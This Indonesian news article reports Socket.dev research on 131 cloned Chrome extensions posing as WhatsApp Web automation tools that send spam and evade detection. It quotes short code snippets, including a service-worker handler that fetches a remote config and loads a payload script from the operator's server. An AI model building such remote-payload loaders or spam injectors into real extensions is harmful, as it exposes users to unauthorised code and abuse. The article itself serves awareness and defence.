Dalam beberapa bulan terakhir, para peneliti keamanan siber menemukan lonjakan besar ekstensi Chrome palsu yang menyamar sebagai alat otomatisasi WhatsApp Web.
Baca Juga : Cara Menghemat Pemakaian RAM Google Chrome: Buat PC/Laptop Kentang
Tercatat ada 131 ekstensi berbahaya yang sebenarnya merupakan kloningan satu sama lain. Masing-masing tampil seolah-olah berbeda, padahal punya kode dasar yang sama, dirancang untuk mengirim pesan massal dan melakukan penjadwalan otomatis tanpa izin pengguna.
Cara kerjanya cukup licik. Ekstensi-ekstensi ini menyuntikkan custom script langsung ke antarmuka WhatsApp Web, sehingga mampu melewati batasan pengiriman pesan dan sistem anti-spam bawaan dari platform tersebut.
Menargetkan Pelaku Bisnis di WhatsApp
Menariknya, ekstensi ini dikemas dengan fitur yang tampak menarik bagi pelaku usaha kecil, terutama di Brasil, negara di mana WhatsApp menjadi alat utama untuk berinteraksi dengan pelanggan.
Di halaman unduhan, mereka mempromosikan berbagai fitur seperti template pesan, pengatur jadwal kirim, hingga dasbor analitik untuk memantau performa pesan. Padahal di balik itu semua, sistemnya diam-diam mengakses data dan menjalankan perintah otomatis di latar belakang.
Ekstensi ini memanfaatkan fitur Manifest V3 milik Chrome, sebuah mekanisme yang memungkinkan service worker berjalan di belakang layar tanpa harus ada interaksi langsung dari pengguna. Dengan begitu, pengiriman pesan bisa terus berjalan meski tab WhatsApp Web tidak sedang dibuka.
Analisis dari Peneliti Socket.dev
.webp "Analisis dari Peneliti Socket.dev")
Menurut laporan dari Socket.dev, bagian inti dari ekstensi ini menggunakan potongan kode seperti berikut:
document.addEventListener(‘DOMContentLoaded’, () => {
const msgHelper = window.WPP.helpers.sendMessage;
scheduledMessages.forEach(({contact, text, time}) => {
setTimeout(() => msgHelper(contact, text), time);
});
});
Kode ini secara langsung menempel pada struktur halaman (DOM) WhatsApp dan memanggil API internal platform tersebut. Akibatnya, batas antara otomatisasi legal dan kampanye spam berbahaya jadi semakin kabur.
Socket.dev juga menemukan bahwa ekstensi-ekstensi ini mengambil file konfigurasi dari server operator untuk memperbarui pola pesan dan interval pengiriman secara dinamis. Tujuannya? Menghindari deteksi oleh sistem keamanan Chrome maupun WhatsApp.
Tetap Aktif Meski Melanggar Aturan
Padahal, kebijakan Chrome Web Store sudah jelas melarang ekstensi duplikat dan aktivitas pengiriman pesan tanpa izin. Namun hingga pertengahan Oktober 2025, semua 131 ekstensi tersebut masih aktif dan bisa diunduh.
Setiap versi bahkan dipasarkan melalui situs profesional dengan janji “aman” dan “sesuai regulasi privasi”. Faktanya, klaim itu bertolak belakang dengan pedoman resmi Chrome.
Lebih parah lagi, sistem distribusinya dibuat seperti program waralaba digital. Mitra cukup membayar biaya lisensi di awal, mendapatkan paket branding kustom, lalu menjual layanan berlangganan kepada pengguna lain. Di balik layar, operator utama tetap mengendalikan seluruh sistem.
Strategi Menghindari Deteksi
Bagian paling canggih dari kampanye ini ada pada kemampuan mereka mengelabui sistem deteksi. Para operator mengatur jeda pengiriman pesan, mengacak isi pesan, dan rutin mengganti akun penerbit agar tidak mudah dilacak.
Mereka bahkan mendaftarkan sinkronisasi periodik agar ekstensi bisa memperbarui payload JavaScript dari server jarak jauh seperti ini:
self.addEventListener(‘periodicsync’, event => {
event.waitUntil(
fetch(configUrl)
.then(response => response.json())
.then(cfg => importScripts(cfg.payloadUrl))
);
});
Dengan cara tersebut, ketika satu versi terdeteksi berbahaya, ekstensi bisa otomatis memuat ulang versi baru yang belum ditandai oleh sistem keamanan Chrome.
Baca Juga : Bug Zimbra SSRF Buka Akses Hacker ke Informasi Sensitif di Server Email
Kampanye ini menunjukkan betapa seriusnya penyalahgunaan kebijakan Chrome Web Store dalam skala besar. Dengan ribuan pengguna aktif dan ratusan ekstensi serupa, para peneliti menyerukan agar ada pengawasan yang lebih ketat dan kesadaran pengguna yang lebih tinggi.
Jadi, sebelum memasang ekstensi apa pun di browser, pastikan sumbernya terpercaya. Jangan mudah tergiur dengan janji fitur otomatisasi, apalagi yang berkaitan dengan platform komunikasi seperti WhatsApp. Sedikit waspada bisa menyelamatkan data dan privasimu.
